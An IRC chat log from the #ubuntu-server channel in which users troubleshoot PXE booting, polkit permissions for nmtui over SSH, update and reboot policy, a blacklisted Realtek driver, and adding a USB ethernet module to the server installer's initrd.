<lunaphyte> http://archive.ubuntu.com/ubuntu/dists/xenial/main/installer-amd64/current/images/netboot/mini.iso
<lunaphyte> https://help.ubuntu.com/community/Installation/MinimalCD
<tomreyn> DexterF: ssh installation won't work unless it's manually selected from the advanced menu of the mini.iso installer, or preseeded.
<tomreyn> i.e. unless you preseed the installer for ssh, you will need to be physically present, or have a networked KVM or serial console (but then you probably wouldn't ask for the ssh method), to boot the installer and select the ssh installation option. once that's done, you can finish the installation remotely.
<lunaphyte> that's neat
<DexterF> tomreyn: thanks
<tomreyn> DexterF: welcome
<znf> Hello.
<znf> I recently upgraded a server from 14.04 to 16.04. Now when I use byobu (with tmux) when I press left/right arrow I get an orange circle int he middle of my screen: http://i.imgur.com/96BEyWt.png
<mko> I installed fresh server, then xen, but now i got stuck in the bootloop. last thing i see on screen is "loading initial ramdisk ..."
<mko> not sure if dmesg should have something in it but its empty
<mko> only advice i found was about updating bios but its up to date
<tikun> on an EFI install, is grub installed on the ESP partition or the standard / partition
#ubuntu-server 2017-09-04
<ideopathic> i'm trying to get a PXEServer going on 16.04.  I've seen various instructions out there,
<ideopathic> but i have not been able to get the machines to boot.  Getting the error "A bootable device has not been detected"
<drab> ideopathic: what steps have you followed?
<drab> a bootable device has not been detected just means that the network boot has failed
<drab> do you see the client getting an ip and a config or something? what happens on the client?
<drab> there's quite a few pieces to make this whole thing working: dhcp/tftp offer with the right file, config file for tftp, netbook on the client side
<ideopathic> I see the client getting an ip from the server.  I I get the Checking Media Presence, Media Present message and then Start PXE over IPv4
<ideopathic> it then switches to IPv6
<drab> and then of course luck and magic with the optional sacrifice of a nice bear to Stallman
<ideopathic> from another client I can access the pxelinux.0 via tftp without issue
<drab> ideopathic: checking media presence? from the bios you mean?
<drab> if it already has got an ipv4 I don't get why it'd be checking for media presence
<ideopathic> That's the message I get on the screen of the client attempting to boot via PXE
<drab> mmmh, that doesn't sound like it's booting yet, if it says checking media file and fails that's still with the pxe boot manager
<drab> nothing to do with tftp or your server setup
<drab> when you say "start PXE over ipv4" , do you mean start looking for a kerbnel to download?
<ideopathic> When the client machine starts up.. it returns the 3 lines Checking Media Presence...\nMedia Present...\nStart PXE over IPv4
<ideopathic> the Start PXE over IPv4 turns into Start PXE over IPv6.  After a period of time, the screen clears and returns the message "A bootable device has not been detected"
<drab> ok, so the machine never receives a pxe offer
<drab> it probably starts on ipv6 after having failed on v4
<drab> so your probably is most likely dhcp config
<drab> if you run tcpdump on the dhcp server or the dhcp server in debug mode, do you see the client requestin an ip and getting back all info including the tftp ones?
<drab> "A bootable device has not been detected" is normal since the disk has no Os installed and the PXE failed to receive a network boot offer
<drab> ideopathic: what's your dhcp server? what's your network layout? please paste your dhcp config
<drab> dpaste.org
<drab> or whatever youi prefer, just not in channel
<ideopathic> drab: https://dpaste.de/MF5B
<ideopathic> thank you
<ideopathic> I am testing node1 at the moment
<drab> ok, first obvious answer, does the mac address match?
<drab> eer, question, not answer
<drab> like are you 100% sure such as that you went into the bios, show system info and found the mac there and compared it?
<drab> if not, where did you get the mac from?
<ideopathic> i scanned the mac from the machine.. but you're right.. let me double check
<drab> ideopathic: I mean, aside from pxe, you should still be seeing entries in syslog from dhcpd
<drab> such as dhcpd: DHCPDISCOVER from ....
<drab> if you don't see those your client isn't even trying to get an ip
<drab> so your problem is far earlier than even pxe
<ideopathic> yes: DHCPREQUEST for 10.10.10.101 (10.10.10.10) from f4:4d:30:6f:19:1a via eno1
<ideopathic> DHCPACK on 10.10.10.101 to f4:4d:30:6f:19:1a via eno1
<drab> ok good, so that part is working fine
<drab> ideopathic: so then if you grep tftp /var/log/syslog, does it show anything?
<drab> on 10.10.10.10
<ideopathic> yes.. I'm seeing bind: Address already in use
<drab> :)
<drab> how have you set up your tftp server?
<ideopathic> i've posted tcpdump: https://dpaste.de/XHAU
<ideopathic> I pretty much followed this for the config: https://www.ostechnix.com/how-to-install-pxe-server-on-ubuntu-16-04/
<ideopathic> tftpd-hpa using inetd
<drab> so you get what it shows in the link if you run systemctl status tftpd-hpa ?
<drab> meaning, it shows it as running?
<ideopathic> shows running
<drab> uhm, that links seems contradictory to me
<drab> if you set the daemon to yes, then you don't want to run it through inetd
<drab> which is probably where the "address already in use" error comes from
<drab> it's one or the other
<ideopathic> got it.... i thought it odd too.
<drab> but then it shouldn't be your problem
<drab> because tftp is already running and the tcpdump shows it's downloading a file
<drab> so that also seems to be working
<drab> what else do you get if you grep tftp /var/log/syslog ? can you dpaste that please?
<ideopathic> https://dpaste.de/Wsu4
<ideopathic> i stripped out the inet conf
<drab> ok, can you try again without inet just in case for some reason that was causing trouble?
<ideopathic> just did.. no love
<drab> ok, that's fine, wasn't expecting it to, just worth checking
<drab> so that looks odd to me because I see no request from the client
<drab> your tcpdump shows pxelinux.0 being downloaded
<ideopathic> I think I solved it... I had to enable legacy boot on the intel nuc for this to work
<drab> oh, great
<ideopathic> wow.. do you know any good links that might cover UEFI boot with Ubuntu?
<ideopathic> drab: thank you for working through this with me.. I was kind of stuck on my own.
<drab> ideopathic: I collected a couple when I was trying to do this myself, but never finished it because we didn't need it so badly to justify the investment
<drab> let me look at my bookmarks
<drab> ideopathic: http://dpaste.com/0XGRQN8
<ideopathic> drab: thank you!
<drab> also note that I do things over http, much faster for parallel installs than tftpd
<drab> so the second links is about http
<drab> which may not apply to you
<drab> ideopathic: if you figure it out I'd love to hear about it :)
<ideopathic> got.. will likely try a little later...
<ideopathic> i have apache running but i think something is off in the config as it's pulling from the interwebs.
<drab> bbl
<lordievader> Good morning
<cpaelzer> hi lordievader
<lordievader> Hey cpaelzer, how are you doing?
<cpaelzer> as good as it can be for a Monday I'd think :-)
<cpaelzer> how are you today?
<lordievader> Doing good here. Having a new keyboard at work :)
<lordievader> (Played a little with it over the weekend though)
<dnegreira> which keyboard ?
 * dnegreira looking into keyboards
<lordievader> A Ducky ONE TKL
<dnegreira> lordievader: neat
<lordievader> I wanted a smaller one I could carry around if need be.
<dnegreira> numlock is mostly useless
<hateball> it's impossible to find a proper TKL keyboard with swedish layout and no windows logo on it :<
<hateball> (preferably backlit also)
<dnegreira> s/numlock.
<dnegreira> s/numlock/numpad
<lordievader> hateball: On these type of keyboards all keys are replacable. If you find a nice key for the win key, simply replace it.
<TJ-> I've hit a problem with 16.04 server, network-manager and policykit, when remoted in over SSH. On the local console nmtui (the ncurses-based configuration tool) can edit system connections. On the remote session nmtui reports "Insufficient Privileges...". As far as I understand this is due to policykit actions but despite trying several alternate actions, and trying some rules, I've not been able to
<TJ-> solve it. Any advice or hints on this?
<lordievader> Same user I presume? Does 'loginctl' show the same output?
<TJ-> Yeah, same user. Obviously there's no PK agent as there's no GUI. I tried several variations of custom actions and rules but not found a solution so far when on SSH
<TJ-> "same output" ? you mean "insufficient privileges"? plain "loginctl" just shows the current sessions (1 local, 1 remote)
<TJ-> as well as some custom action attempts I've tried this rule:
<TJ->   if (action.id == "org.freedesktop.NetworkManager.settings.modify.system" &&
<TJ->         (subject.isInGroup ("sudo") || subject.isInGroup ("netdev"))) {
<TJ->     return polkit.Result.YES;
<TJ-> I've got it to work setting ResultAny=yes" Action=org.freedesktop.NetworkManager.settings.modify.system Identity=unix-group:sudo  in /etc/policykit/localauthority/50-local.d/60-network-manager.pkla, but my initial reading of the docs suggested that ResultAny=yes wasn't very secure. I'd best reread that
<lordievader> I always got the idea that polkit was very related to logind.
<lordievader> Didn't the auth log point to why access was denied?
<TJ-> There was nothing at all in auth
<lordievader> Ah, you might need to add log statements in order to have polkit actually log things: https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html
<TJ-> Yes, I tried that too, but couldn't find them anywhere in the recorded log files
<lordievader> Not in the systemd journal either?
<TJ-> Nowhere
<gunix> how often should i update ubuntu serve?
<ogra_> every time it tells you to at the login scrreen
<gunix> ogra_: not possible in production situations where downtime has to be agreed with by customers.
<ogra_> well, then whenever your schedule allows ... what i meant to point out is that the machine tells you if there are updates available
<gunix> ogra_: normally distros have specifications regarding how long you can go without upgrades, without living in the fear that a big upgrade will break the system. for example, archlinux should be upgraded once per day, but debian can go for months without upgrades. debian testing should be upgrade once per week. debian sid should get upgraded daily.
<lordievader> gunix: Updates do not necesarily mean downtime.
<gunix> lordievader: ubuntu has weekly kernel upgrades
<lordievader> So? Since when are you forced to reboot when there is a kernel update?
<lordievader> If you have good reason to reboot to a new kernel once  month, you reboot  once a month.
<lordievader> And the above seems like a good reason to me.
<gunix> sound like "do w/e you want and reboot when you can" :))
<lordievader> Pretty much. Linux/Ubuntu won't force you to do anything. If a certain practice is wise is something different ;)
 * ogra_ highly doubts debian can go for months without upgrades 
<ogra_> (unless you dont care about security at alll)
<lordievader> I'd do updates as often as possible. And reboot when necesary and possible.
<gunix> ogra_: it has kernel upgrades once every 2-3 months, and upgrades usually come as a huge pack, except security upgrades
<ogra_> ubuntu LTS is in the same boat as debian stable though
<gunix> ogra_: isn't ubuntu LTS based on debian testing?
<ogra_> no on unstable ... with 6months of stabilization
<gunix> lordievader: i am not asking about what ubuntu forces me. i am asking how it is wise to do.
<ogra_> wise is to do it every time there is a security update :)
<gunix> ogra_: do you have a link with that information?
<ogra_> not really
<gunix> ogra_: wait a sec
<ogra_> there are mailing lists where that was discussed ... i guess the ubuntu-devel ML
<ogra_> there were a few LTSes in the beginjning where using testing was tried ...
<ogra_> typically only if the release schedules have some bad overlap or so, so that unstable would be to risky
<gunix> ogra_: lts is based on debian testing and other versions are based on debian unstable
<ogra_> gunix, https://wiki.ubuntu.com/LTS
<gunix> well, anyway, i am going to ask again, but rephrase: does ubuntu provide any official advice on how often the ubuntu server should be upgraded?
<ogra_> "Starting with the 14.04 LTS development cycle, automatic full package import is performed from Debian unstable"
<ogra_> every time you have a security upgrade :)
<gunix> ogra_: thank you, i didn't know that.
<gunix> ogra_: do you have a link?
<ogra_> for what ?
<gunix>  ogra_ | every time you have a security upgrade :)
<maswan> Yeah, I'd recommend automatic updates
<ogra_> well, thats common sense ...
<gunix> i want to see the official page from ubuntu on this
<maswan> Possibly with blacklisting of things that won't handle a restart well, like postrges for some applications using it, etc
<ogra_> you dont want your production systems to run with open security holes
<gunix> well, equally if it makes sense or not, i need the recommandation from the website. that's what i am searching for :)
<ogra_> i doubt thats anywhere written as recommendation simply because its a logical conclusion
<ogra_> if theer is a known security hole you want it closed ASAP
<ogra_> https://help.ubuntu.com/community/AutomaticSecurityUpdates btw
<gunix> ogra_: yes, that is clear.
<ogra_> https://help.ubuntu.com/community/AutomaticSecurityUpdates#Using_the_.22unattended-upgrades.22_package
<ogra_> that bit specifically
<gunix> hmm. this should do. looks official enough. i will suggest automatic upgrades, with these articles as backup, and monthly reboots during security windows. thank you!
<tomreyn> gunix: it would be better to have two business processes - one which ensures monthly reboots, another which ensures reboots upon critical kernel vulnerabilities.
<tomreyn> you dot want to sit around 30 days with a vulnerable kernel in case of critical security issues.
<gunix> tomreyn: that sounds like a good plan
<tomreyn> you could also just do the critical ones but this would only work if you can ensure it happening reliably and fast. or look into live kernel patching.
<gunix> tomreyn: live kernel patching is not really that safe yet.
<tomreyn> HA is and always will be the bette roption
 * drab wishes ldirectord was simpler to manage
<madLyfe> lordievader: you around? i need your master on the server installer
<madLyfe> mastery*
<Ussat> TBH I will never trust live patching....on any of my systems....AIX/RHEL or Ubuntu
<jbicha> Any suggested things people would like to see in 18.04 on the server side: LP: #1618188
<ubottu> Launchpad bug 1618188 in ubuntu-meta (Ubuntu) "systemd journal should be persistent by default: /var/log/journal should be created; remove rsyslog from default installs" [Wishlist,Triaged] https://launchpad.net/bugs/1618188
<jbicha> probably more of a Foundations thing, right? but it's nice when everybody agrees on taking the step
<madLyfe> maybe you guys can help. i need to get the server installer to recognize my usb ethernet adapter. it has the module because if i complete the install w/o setting up the adapter i am able to manually set it up after boot by going into the network interfaces file.
<madLyfe> the desktop live usb doesnt have a problem recognizing the adapter either.
<madLyfe> so i just want to get it to recognize during install on server.
#ubuntu-server 2017-09-05
<necrophcodr> Is it possible to pass dpkg options to aptitude, like you can apt-get?
<soahccc> I'm not very good with kernel related stuff and I had never a problem with it but now is the time I'm afraid. Would there be anything wrong with running 16.04 on a 3.11 driver? I dist-upgraded this server and it can't network anymore and I get ACPI errors in log so I have to assume it's the kernel right?
<cpaelzer> soahccc: it is not what is supported/tested so you might run into a random amount of new errors
<cpaelzer> soahccc: I'd try the newer kernels if they fixed whatever you are facing as an issue
<cpaelzer> soahccc: https://wiki.ubuntu.com/Kernel/LTSEnablementStack
<soahccc> cpaelzer: Well it was a 12.04 system and I just did a do-release-upgrade (to I assume 14.04? iirc it doesn't go straight to 16.04) and it wont "come up". I started rescue system and the only thing I could find were some ACPI warnings and that NTP can't find a host
<cpaelzer> soahccc: ah I thought you are on 16.04 given your question of a 3.11 kernel on it
<cpaelzer> the ntp message likely just means no network which matches your former statement
<cpaelzer> I usually don't give too much on ACPI warnings
<cpaelzer> what is your network setup - I rareley had a case where newer kernels dropped support of HW that worked before
<cpaelzer> unless that was a USB network with dkms drivers not building or something like ti
<soahccc> The thing is I do have 2 identical servers (same hardware) and one is still working on 12.04. I upgraded a few servers (with different hardware) no issues. And those servers actually had a lot of services running on them. My problematic server is a file server and only has nginx and SSH
<cpaelzer> soahccc: what you have to find out is why network is not initializing correctly on it
<cpaelzer> soahccc: compare the dmesg / syslog on good and bad server in regard to networking
<cpaelzer> soahccc: there must be something your upgraded server fails on in regard to networking right?
<soahccc> What do you mean exactly by network setup? it's a dedicated server and I haven't done a thing to what the hoster originally configured in /etc/network/interfaces
<soahccc> And yes I guess it's networking. I can't reach it via SSH or ping but cron seems to be doing something according to syslog
<cpaelzer> soahccc: I meant what type of network card it is, how it was set up before, ....
<cpaelzer> soahccc: and in the log I meant that this card somehow has to fail to be brought up correctly
<cpaelzer> soahccc: maybe it just changed names
<cpaelzer> and the old config doesn't apply anymore
<cpaelzer> you'd find that to soem extend by comparing the boot messages
<cpaelzer> e.g. as what device it was initialized
<soahccc> at least it's the same exact card in both of them: Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller (rev 09)
<soahccc> cpaelzer: I compared dmesg of the two servers + dmesg of the rescue system and it seems as that the new kernel seemingly doesn't find the card https://gist.github.com/2called-chaos/c86f0c7eaa4a8cbf2521430b9c656dc0
<soahccc> I remember there to be issues with r8169 back in the days (and you should use official r8168) but the new one seems to work fine on the rescue system... Oh those realtek cards
<soahccc> Okay for some reason, and I assume it was related to those drive issues, r8169 is blacklisted in modprobe blacklist and it's the only one available... Well i guess this problem is fixed :D
<soahccc> cpaelzer: thanks anyways :)
<hehehe> hey hey
<hehehe> have u seen that PIA lifetime subscription is on sale
<hehehe> for 49 something
<hehehe> but hmm
<hehehe> is it truly lifetime?
<hehehe> cause its sooo cheap
<necrophcodr> Is it possible to pass dpkg options to aptitude, like you can apt-get?
<RoyK> necrophcodr: I don't think aptitude is very well supported on newer versions debian/ubuntu
<RoyK> things are moving towards apt
<RoyK> dunno if that suports dpkg opts, though
<necrophcodr> RoyK, I'm aware, but aptitude has more strict dependency handling which I prefer.
<hehehe> hi folks
<hehehe> for some reason I cant ssh to the box
<hehehe> I logged in via kvm, nothing in syslog
<hehehe> maybe it something to do with fail2ban jailing sshd?
<hehehe> hi _KaszpiR_  :P
<hehehe> messup ips
<hehehe> in fact works
<hhee> good day. how do you usually monitor .conf files changing over time?
<hehehe> you could use auditd
<hehehe> to monitor changes in files
<hhee> hehehe, how can i see previous version of files?
<hhee> in etc e.g.
<hhee> etckeeper probably
<hehehe> i am looking into it
<hehehe> i dont know
<hehehe> want to eat so maybe will check later
<hehehe> auditd does log who accessed file
<hehehe> but to log nature of changes to the file
<hehehe> maybe sarnold  knows?
<hehehe> :)
<hehehe> its rather handy feature
<madLyfe> nacc: its tuesday!
<nacc> madLyfe: heya
<madLyfe> your brain ready for a beating? :P
<nacc> madLyfe: yeah
<madLyfe> how should we start? state the problem first?
<nacc> madLyfe: yeah, from the beginning
<madLyfe> i have two usb ethernet adapters that are not being recognized by the ubuntu server installer during the network devices check. if i complete the install w/o setting up a network interface and reboot, i can go into the network interfaces file and manually add the adapter. it shows up in the lsusb list. i dont remember if i had to modprobe it first though.
<madLyfe> what that means is the modules are there for the thing to work but for some reason there is a disconnect during the installer. i would to remedy that.
<nacc> ok, stop there
<nacc> when you say you have two usb ethernet adapters, do you mean you have two different ones? or you have two of the same, and neither work, or?
<nacc> not knowing if you needed to modprobe something or not is sort of a dealbreaker :) can we figure that out?
<madLyfe> i have two different branded usb ethernet adapters. the name of the adapter is different under ubuntu desktop connection details but they seem to show they are using the same r8152, or whatever that was, module.
<madLyfe> does the modprobe matter? if i had to do the modprobe it was after the install anyways.
<nacc> madLyfe: well, if you had to do it or not, does matter
<nacc> madLyfe: to be clear, editign /e/n/i does not make your device recognized, something else does
<nacc> madLyfe: and, iirc, you cannot modprobe r8152 in the installer, correct?
<madLyfe> ya i think thats correct.
<madLyfe> should i try to modprobe the installer again or after install again?
<nacc> madLyfe: i would do both, so we know clearly what works and doesn't
<nacc> there is to much "seem" in the above to solve the problem
<madLyfe> well im installing to a usb drive on my laptop. im showing two ethernet controllers and those are the built in wifi and the onboard lan.
<madLyfe> not the connected usb ethernet adapter.
<madLyfe> https://usercontent.irccloud-cdn.com/file/Vd2MF8Ry/irccloudcapture870703048.jpg
<nacc> rbasak: powersj: do you have time to do a HO to discuss the testing idea we had? (integration testpoint)
<powersj> sure
<nacc> madLyfe: ok, that's the server installer?
<madLyfe> yep
<nacc> madLyfe: ok, and if you go back and drop to a shell, are youa ble to load the module?
<madLyfe> her is what this config looks like btw. in case you needed a clearer picture https://usercontent.irccloud-cdn.com/file/ULPHYmqD/irccloudcapture1151996363.jpg
<rbasak> nacc, powersj: yes
<nacc> rbasak: thanks
<nacc> madLyfe: wasn't it a server box before? so you this on your laptop as well?
<madLyfe> so 'modprobe r8152'?
<nacc> madLyfe: whatever the module was called, yeah
<madLyfe> im just testing the installer so i didnt think it matters. just trying to get the installer to recognize the adapter shown in the picture
<nacc> madLyfe: sure, just trying to understand
<nacc> madLyfe: the more you chnage from what i remember/what you say, the harder it is for me to help :)
<madLyfe> yes, this is all for the server.
<madLyfe> ya, sorry.
<nacc> madLyfe: it's cool
<nacc> rbasak: powersj: shall we use the standup?
<powersj> sure be right there
<madLyfe> i believe this is what we did. actually i have all those pictures saved: https://usercontent.irccloud-cdn.com/file/mRQaFwPe/irccloudcapture474510748.jpg
<nacc> madLyfe: right, so before and after you modprobe, can you do the `ip link` and show me hte difference, if any?
<madLyfe> ya we couldnt get it working from the installer: https://usercontent.irccloud-cdn.com/file/HSKOFuXK/irccloudcapture756594906.jpg
<madLyfe> https://usercontent.irccloud-cdn.com/file/aX5fRVTs/irccloudcapture1437707674.jpg
<nacc> powersj: LP: #1714539 created
<ubottu> Launchpad bug 1714539 in usd-importer "build: errors reported after pristine-tar introduction" [Critical,Fix released] https://launchpad.net/bugs/1714539
<powersj> nacc: thank you!
<nacc> nope, not thate one :)
<powersj> lol
<nacc> powersj: LP: #1715195
<ubottu> Launchpad bug 1715195 in usd-importer "jenkins job should run integration testws" [Undecided,New] https://launchpad.net/bugs/1715195
<powersj> there we go :)
<nacc> powersj: and trello card
<docmur> Hey guys, I asked this in the linux channel also
<docmur> Hey guys, I bought some new external IP's for my server, I added them to /etc/network/interface and I restarted the interface, here is my ip addr list ( editted ): https://pastebin.com/zfPSBCm3 including the ip r list, now that I can see them shouldn't I be able to ping and ssh to those addresses?
<Ussat> So, asterik on Ubuntu...tell me its not all compile source
<madLyfe> nacc: i didnt notice anything for the ip link. though, im not sure what im looking for.
<madLyfe> modprobe for that module was fatal though
<nacc> !info asterisk | Ussat
<ubottu> Ussat: asterisk (source: asterisk): Open Source Private Branch Exchange (PBX). In component universe, is optional. Version 1:13.13.1~dfsg-4ubuntu1 (zesty), package size 1420 kB, installed size 5520 kB
<nacc> Ussat: that?
<Ussat> Yes, thanks
<nacc> madLyfe: https://usercontent.irccloud-cdn.com/file/mRQaFwPe/irccloudcapture474510748.jpg so what env was this?
<Ussat> perfect
<Ussat> nacc, do I need to modify anything to get that or just apt-get install it ?
<madLyfe> that was after a completed server install on the actual server hardware, with usb ethernet adapter.
<nacc> Ussat: you need universe installed
<nacc> *enabled
<nacc> Ussat: then just apt install
<nacc> madLyfe: right, so afaict, my conclusion before was still correct ( the one i think you were disputing at EOW). The stock Ubuntu server iso image does not contain the module you need for your USB network adapter in the installer initrd.
<nacc> madLyfe: so your solution to fix that is to either use desktop & remove a bunch of packages so that it's server at the end.
<nacc> madLyfe: or remaster the server installer ISO
<madLyfe> how is it not there if after install i can modprobe it and manually add it to the network interface file?
<nacc> *after install* is not the installer environment.
<nacc> i'm not sure why that's not clear?
<nacc> rbasak: powersj: tests/bin/jenkins-integration-test?
<madLyfe> but the module has to be there in the iso for it to then be there after the install completes?
<nacc> madLyfe: no.
<nacc> madLyfe: or, at least, not necessarily
<madLyfe> what kind of sorcery is that?
<powersj> nacc: that or a tools dir if you have a collection of stuff that does random things :)
<nacc> madLyfe: what do you think you mean by "in the iso"?
<powersj> and you could even leave out the jenkins part if you can run it locally
<nacc> madLyfe: when I say that, I mean in /lib/modules/ in the installer environment.
<Ussat> OK, thanks
<madLyfe> i have no idea, i obv dont understand something.
<madLyfe> is the needed module just not in the correct location on the iso to be used or soemthing?
<madLyfe> something*
<nacc> madLyfe: on the iso, is the -extra .deb available? (not avialable to install, but present on the iso)
<madLyfe> it has to be there for it to be there after the installer completes. it can just appear out of thin air w/o internet.
<nacc> madLyfe: it can be in a package and not present in the installer environment.
<nacc> madLyfe: again, be *clear* about what you mean about "be there"
<nacc> madLyfe: I'm saying it's not an available module in th einstaller environmnet.
<madLyfe> so i just need to get that module to the installer environment for it to use it during install
<nacc> madLyfe: *if* that is possible.
<nacc> madLyfe: it's also possible for the installer kernel and the to-be-installed kernel to not be the same (I think)
<nacc> madLyfe: form the installer, run something like `find / -name 'linux.*extra.*.deb'`
<madLyfe> just returned a new line
<nacc> madLyfe: so not found
<Ussat> nacc, thanks
<nacc> madLyfe: do you have an *installed* server image around?
<nacc> Ussat: yw
<Ussat> That pulls in all the deps etc I assume ?
<madLyfe> not currently
<nacc> Ussat: yes.
<madLyfe> i can run this installer, w/o the adapter(obv), and use that?
<Ussat> Making a local (as in on my work system) POC , assuming that goes OK will put it on the esxi cluster in a VM there
<nacc> madLyfe: to be sure, 'find / -name 'linux-image-extra.*'`
<madLyfe> https://usercontent.irccloud-cdn.com/file/6XdEjfg8/irccloudcapture1090446043.jpg
<nacc> rbasak: powersj: something like: http://paste.ubuntu.com/25473445/
<nacc> madLyfe: you have a trailing `
<nacc> madLyfe: so it is waiting for you to complete the input
<madLyfe> just enter again?
<nacc> madLyfe: ctrl+C and don't put the ` in
<madLyfe> oh
<powersj> nacc: that works, only need to add checks for exit codes on failure so Jenkins knows to pass or fail.
<madLyfe> ctrl+c isnt doing its job
<madLyfe> https://usercontent.irccloud-cdn.com/file/plRLSak1/irccloudcapture52227506.jpg
<nacc> powersj: if i `set -e` it, that should be sufficient, right?
<powersj> nacc: yes
<nacc> madLyfe: right, becuase you are *still* in the subshell
<nacc> madLyfe: so `<enter>
<nacc> it will probably complain
<nacc> powersj: thanks
<madLyfe> nah it got me to regular command entry. did the last string you posted and it just returned a new line as well
<nacc> madLyfe: `ls -ahl /pool/main/l/linux/linux-image*.deb`
<nacc> madLyfe: and/or (sorry typo'd above) `find / -name linux-image-extra*`
<madLyfe> so not this? ls -ahl /pool/main/l/linux/linux-image*.deb
<nacc> madLyfe: either of them
<nacc> (hence and/or)
<nacc> madLyfe: they give us the same info, i expect
<madLyfe> https://usercontent.irccloud-cdn.com/file/fUo00FU0/irccloudcapture488449475.jpg
<nacc> madLyfe: ok, so do a `dpkg -i /cdrom/pool/main/l/linux/linux-image-extra/4.4.0-87-generic_4.4.0-87.110_amd64.deb; modprobe r8152`
<nacc> the dpkg *may* fail, i'm not sure, it depends on the deps
<madLyfe> https://usercontent.irccloud-cdn.com/file/6D9pqmo3/irccloudcapture1293490634.jpg
<madLyfe> no idea why it was cutting off text like that
<nacc> madLyfe: i forget how to install packages in the installer, you might have to let the installer go a bit further so the env is more setup than where you're at
<nacc> powersj: --^ do you recall? this is a .deb that's present on the iso, but not part of the installer env itself
<powersj> nacc: trying to add a package to the installer it self or in the target?
<nacc> powersj: installer itself
<nacc> powersj: in this case, the installer (to use network) needs the -extra package installed so that it can use a specific kernel module in it
<powersj> ah, I haven't had to do that before, but busybox doesn't come with much
<nacc> yeah
<nacc> i think dpkg will 'become' available once the installer env is setup (that hapens right after network)
<madLyfe> so this is recognizing the two network interfaces on the laptop, i need to select one to continue?
<nacc> madLyfe: yeah, we want to stop after the step after that
<madLyfe> k, i dont have a cable plugged into the lan port, but it was trying to find the link they configuring the dhcp.
<nacc> right, you can let it just fail to configure networking like you do when you try to use the usb adpater on your server?
<madLyfe> https://usercontent.irccloud-cdn.com/file/WY1HuboW/irccloudcapture1631082337.jpg
<nacc> madLyfe: do not configure
<madLyfe> k
<nacc> madLyfe: and then whenever you can at the next point, stop the installer, and go back to the shell
<madLyfe> now its asking for hostname
<madLyfe> k
<nacc> madLyfe: put whatever for th ehostname
<nacc> madLyfe: like i said, we're not going to install yet
<nacc> madLyfe: but we want it to setup the installer env
<madLyfe> ok at the shell
<nacc> madLyfe: `which dpkg`
<madLyfe> which: not found
<nacc> madLyfe: bah `ls -ahl /usr/bin/dpkg`
<madLyfe>  /ush/bin/dpkg: not such file or dir
<nacc> madLyfe: was that a typo? (ush)
<nacc> madLyfe: hopefully you just undersatnd what i'm trying to do
<nacc> madLyfe: is dpkg avialable/
<nacc> madLyfe: if it is, we cna try to install the package like before
<nacc> madLyfe: if not, go to the next step in the installer and try again
<madLyfe> https://usercontent.irccloud-cdn.com/file/uIyLCWJm/irccloudcapture946100515.jpg
<nacc> madLyfe: ok, so follow what i just said
<madLyfe> i just went through the user setup, timezone, and am not at the partitioner. will go back to shell now
<madLyfe> still no such file or dir
<nacc> madLyfe: can you just run 'dpkg'?
<madLyfe> dpkg: not found
<nacc> madLyfe: ok, keep going then
<madLyfe> partitioning disk and its installing the system now
<nacc> madLyfe: ok, i think you can hit cancel (if poss.) and drop to the shell, maybe
<madLyfe> lol what is the cancel button?
<nacc> madLyfe: i'm wondering now if possibly dpkg is never available in the installer, but in the to-be-installed system (e.g., /target or whatever)
<madLyfe> its not letting me alt-f back to get to shell anymore
<madLyfe> just continues on with the install if i press that
<madLyfe> its at the grub installer right now
<madLyfe> so we are kinda back to square 1, nacc?
<nacc> madLyfe: i think the simples solution is to just remaster the iso
<nacc> madLyfe: basically, modify the initrd on the usb
<madLyfe> is that difficult?
<nacc> madLyfe: not especially, afaict.
<nacc> madLyfe: https://wiki.ubuntu.com/Initramfs
<nacc> i think that's roughly correct
<nacc> madLyfe: basically, tkae your existing usb, cp the initrd used by the installer to /tmp
<nacc> extract it
<nacc> add the one driver you need to the extracted initrd
<nacc> recompress it
<nacc> and put that initrd on your usb
<madLyfe> probably start from ubuntu desktop?
<nacc> madLyfe: hrm?
<nacc> madLyfe: you need to be on linux to do the above, yes
<nacc> madLyfe: it shouldn't matter if you are on desktop or server
<madLyfe> ya, just booted up the live usb
<madLyfe> downloading the server iso to a clean usb stick from ubuntu desktop, nacc
<nacc> madLyfe: wait
<nacc> madLyfe: well, i guess that's fine, ok
<madLyfe> so i have a usb with the iso on it, a usb with bootable installer on it. can use either.
<madLyfe> https://usercontent.irccloud-cdn.com/file/WkJArBvq/irccloudcapture235993422.jpg
<nacc> you want to use the UBUNTU-SERV one
<nacc> madLyfe: so you're going to use the above instructions, using boot/<appropriate initrd>
<madLyfe> oh so i didnt really need to download it again since i already have a bootable usb?
<nacc> madLyfe: right
<madLyfe> ok extracted initrd.gz
<madLyfe> but just gave me initrd
<madLyfe> extract that as well?
<nacc> madLyfe: did you read the wiki page above?
<nacc> madLyfe: it's not just a straight gunzip
<nacc> madLyfe: you have to use cpio
<madLyfe> ya I looked at it but it's pretty foreign stuff to me.. https://usercontent.irccloud-cdn.com/file/20x8LTH0/irccloudcapture1938095891.jpg
<nacc> madLyfe: specifically, do this all from the terminal and read the directions starting at 'cd `mktemp -d`...
<nacc> madLyfe: honestly, there's quite a bit to learn here
<nacc> madLyfe: i've spent about as much time as i can today on it
<nacc> madLyfe: i'm sure you can google around and find clear instructions on how to add a module to the initrd
<madLyfe> np ty for your help nacc
<Ussat> so does anyone know if this:  https://bugs.launchpad.net/ubuntu/+source/asterisk/+bug/1458323 is fixed in 17.04 ?
<ubottu> Launchpad bug 1458323 in asterisk (Ubuntu) "Asterisk crashes with default install because of pjsip" [High,Confirmed]
<Ussat> I know there is a work around,  but might move thos to 17.04 if its fixed
<Ussat> Welp, 17.04 does not have that bug \o/
<nacc> Ussat: can you update the bug with that info?
<nacc> cpaelzer: while not disallowed, it's weird to see upload tags in your repository (ntp)
<Epx998> how to copy a file to a bunch of windows servers hmmm
<powersj> nacc: does this look right? Anything special I have to do? `uvt-simplestreams-libvirt sync release=artful arch=amd64`
<powersj> xenial works as expected
<rharper> powersj: you need to use ~=(rel1|rel2|rel2)
<rharper> otherwise, when you sync, it will remove any release that doesn't match your sync criteria ;
<rharper> I assume that's what you're looking for (was non-obvious to me a while back as well)
<rharper> this is what I use for syncing daily images: uvt-simplestreams-libvirt --verbose sync --source http://cloud-images.ubuntu.com/daily "release~(xenial|trusty|zesty|artful)" arch=amd64
<rharper> powersj: I think artful might only be in the daily (since it's not yet released)
<nacc> yeah, sync literally syncs local to remote, exactly
<nacc> as opposed to one-way, which i suppose is to prune dead releases
